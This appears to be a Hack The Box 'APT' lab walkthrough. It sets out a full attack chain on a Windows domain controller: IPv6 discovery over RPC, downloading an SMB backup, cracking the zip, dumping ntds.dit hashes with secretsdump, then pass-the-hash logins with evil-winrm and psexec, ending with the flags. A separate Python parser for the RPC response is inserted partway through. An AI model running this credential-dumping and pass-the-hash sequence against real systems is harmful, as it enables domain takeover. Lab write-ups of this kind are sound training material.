htb-apt-nl


I used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py

Reference used:

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication

┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e
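What IOXIDresolver.py prints is the list of STRINGBINDING network addresses inside the DUALSTRINGARRAY that IObjectExporter::ServerAlive2 returns over TCP/135, with no authentication at all. The block below is an added example, not the page's or the script's own code: a stand-alone encoder and decoder for that structure (layout as I read MS-DCOM 2.2.19: u16 wNumEntries and wSecurityOffset counted in u16 units, then tower-id-prefixed null-terminated UTF-16LE string bindings ending in a zero tower id, then the security bindings ending the same way). It runs offline against a constructed blob that mimics the response above; the tower ids in TOWER_NAMES and the 0x0A authentication-service value are assumptions taken from MS-RPCE/MS-DCOM, not from the page.

```python
"""Encode/decode the DUALSTRINGARRAY returned by IObjectExporter::ServerAlive2.

Added example: stand-alone code fed a constructed blob, not IOXIDresolver.py's
own parsing and not a live RPC call.  Layout per MS-DCOM 2.2.19 (assumption):
  u16 wNumEntries, u16 wSecurityOffset (both in u16 units), then
  STRINGBINDINGs  (u16 tower id, null-terminated UTF-16LE addr)... u16 0
  SECURITYBINDINGs (u16 authn svc, u16 0xFFFF, null-terminated principal)... u16 0
"""
import struct

# Protocol-sequence tower ids (assumed values from MS-RPCE / MS-DCOM).
TOWER_NAMES = {0x07: "ncacn_ip_tcp", 0x08: "ncadg_ip_udp", 0x0F: "ncacn_np"}


def _ustr(s):
    """Null-terminated UTF-16LE string as stored inside the array."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_dualstringarray(bindings, authn_svc=0x0A, principal=""):
    """Encode [(tower_id, network_addr)] plus one SECURITYBINDING."""
    str_part = b"".join(struct.pack("<H", tid) + _ustr(addr) for tid, addr in bindings)
    str_part += b"\x00\x00"  # zero tower id terminates the string bindings
    sec_part = struct.pack("<HH", authn_svc, 0xFFFF) + _ustr(principal) + b"\x00\x00"
    body = str_part + sec_part
    return struct.pack("<HH", len(body) // 2, len(str_part) // 2) + body


def _read_ustr(buf, pos):
    """Read a null-terminated UTF-16LE string at pos; return (text, new_pos)."""
    end = pos
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(buf):
        raise ValueError("unterminated string in DUALSTRINGARRAY")
    return buf[pos:end].decode("utf-16-le"), end + 2


def parse_dualstringarray(buf):
    """Return {'bindings': [(tower_id, addr)], 'security': [(authn_svc, principal)]}.

    The reply arrives unauthenticated, so the peer controls both length
    fields; every read is bounds-checked and a bad structure raises ValueError."""
    if len(buf) < 4:
        raise ValueError("short header")
    num_entries, sec_off = struct.unpack_from("<HH", buf, 0)
    body = buf[4:4 + num_entries * 2]
    if len(body) != num_entries * 2 or sec_off > num_entries:
        raise ValueError("length fields exceed buffer")
    str_part, sec_part = body[:sec_off * 2], body[sec_off * 2:]

    bindings, pos = [], 0
    while True:
        if pos + 2 > len(str_part):
            raise ValueError("string bindings not terminated")
        (tid,) = struct.unpack_from("<H", str_part, pos)
        pos += 2
        if tid == 0:
            break
        addr, pos = _read_ustr(str_part, pos)
        bindings.append((tid, addr))

    security, pos = [], 0
    while True:
        if pos + 2 > len(sec_part):
            raise ValueError("security bindings not terminated")
        (svc,) = struct.unpack_from("<H", sec_part, pos)
        pos += 2
        if svc == 0:
            break
        pos += 2  # Reserved field (0xFFFF)
        name, pos = _read_ustr(sec_part, pos)
        security.append((svc, name))
    return {"bindings": bindings, "security": security}


def addresses(buf):
    """The values IOXIDresolver.py prints as 'Address: ...' lines."""
    return [addr for _tid, addr in parse_dualstringarray(buf)["bindings"]]


# Constructed blob mimicking the response shown in the walkthrough above.
SAMPLE = build_dualstringarray([
    (0x07, "apt"),
    (0x07, "10.10.10.213"),
    (0x07, "dead:beef::b885:d62a:d679:573f"),
    (0x07, "dead:beef::8d29:507a:2edb:a06e"),
])

if __name__ == "__main__":
    for tid, addr in parse_dualstringarray(SAMPLE)["bindings"]:
        print(f"{TOWER_NAMES.get(tid, hex(tid))}: {addr}")
```

Run as a script it prints each binding with its protocol sequence. The point of the bounds checks is that the resolver on the other end is untrusted: the two u16 length fields are whatever the peer sent, so a decoder that trusts them can be walked off the end of the buffer.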


kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p '!!!watermelon245'


$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds


evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht'

1) get the IPv6 address of the DC (IOXIDresolver.py, above)
2) connect to the backup share with smbclient and download backup.zip
3) crack the zip password with zip2john and john against rockyou.txt
4) run impacket's secretsdump.py on the extracted ntds.dit together with the SYSTEM hive
5) run kerbrute userenum on the dumped user names to find which accounts still exist
6) make a list of their NT hashes
7) spray them with crackmapexec -H hashes.txt

Note: the Administrator hash in the backup's ntds.dit (2b576acbe6bcfda7294d6bd18041b8fe, below) is not the current one; the hash that logs in at the end is c370bddf384a691d811ff3495e8a72e2, so that password has changed since the backup was taken.

┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 .
drw-rw-rw-          0  Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw-   10650961  Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit 
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up... 

┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e

evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2


Thus, the working order of operations:

1st: add the IPv6 address to /etc/hosts. evil-winrm builds http://<target>:5985/wsman from the -i value and rejects a bare IPv6 literal (see the URI::InvalidURIError under 3rd), so connect by name instead:
dead:beef::b885:d62a:d679:573f apt.htb htb.local

2nd: log in as henry.vinson_adm by hostname:

┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password:G1#Ny5@2dvh

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls


Directory: C:\Users\henry.vinson_adm\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/25/2021 11:53 AM 12674 Powerless.bat


*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat


Info: Download successful!

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

3rd: log in as Administrator with the NT hash. The same command against the raw IPv6 literal fails (the address is put into the wsman URL unbracketed); by hostname it works:

┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
henry.vinson henry.vinson_adm krbtgt
The command completed with one or more errors.


*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir

Directory: C:\Users\Administrator

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/24/2020 9:12 AM Contacts
d-r--- 10/23/2020 10:59 AM Desktop
d-r--- 9/24/2020 9:12 AM Documents
d-r--- 9/24/2020 9:12 AM Downloads
d-r--- 9/24/2020 9:12 AM Favorites
d-r--- 9/24/2020 9:12 AM Links
d-r--- 9/24/2020 9:12 AM Music
d-r--- 9/24/2020 9:12 AM Pictures
d-r--- 9/24/2020 9:12 AM Saved Games
d-r--- 9/24/2020 9:12 AM Searches
d-r--- 9/24/2020 9:12 AM Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/4/2020 1:22 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> dir
Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public

*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>

The same NT hash also works with impacket's psexec from a Windows box. -hashes takes LMHASH:NTHASH; repeating the NT hash in the LM slot is harmless (-hashes :c370bddf384a691d811ff3495e8a72e2 works as well), since the NT hash is what authenticates:

E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....
